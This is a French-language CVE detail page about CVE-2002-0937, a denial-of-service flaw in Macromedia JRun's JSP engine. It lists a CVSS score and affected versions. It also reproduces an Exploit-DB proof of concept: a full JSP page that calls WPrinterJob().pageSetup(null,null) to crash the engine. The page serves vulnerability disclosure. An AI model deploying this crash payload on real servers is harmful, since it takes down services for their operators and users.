CVE-2002-0937 : Détail

CVE-2002-0937

0.67%V3
Network
2002-08-31
02h00 +00:00
2002-09-10
07h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The Java Server Pages (JSP) engine in JRun allows web page owners to cause a denial of service (engine crash) on the web server via a JSP page that calls WPrinterJob().pageSetup(null,null).

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 21536

Date de publication : 2002-06-11 22h00 +00:00
Auteur : Marc Schoenefeld
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/4997/info A vulnerability has been reported in Macromedia JRun for Windows that results in a denial of service condition. The vulnerability occurs when JRun encounters a malicious JSP page. The following snippet of code is reported to crash the JRun JSP engine: new WPrinterJob().pageSetup(null,null); <%@ page contentType="text/html;charset=UTF-8" pageEncoding="iso-8859-1" %> <%@ page import="sun.awt.windows.*" %> <%! %> <% // %> <html> <head> <title>aa</title> </head> <body> <p> <FONT SIZE="+2">dON/T TR1 thiz @ home</font> </p> <% new WPrinterJob().pageSetup(null,null); %> </body> </html>

Products Mentioned

Configuraton 0

Macromedia>>Jrun >> Version 3.0

Macromedia>>Jrun >> Version 3.1

Macromedia>>Jrun >> Version 4.0

Références

http://www.securityfocus.com/bid/4997
Tags : vdb-entry, x_refsource_BID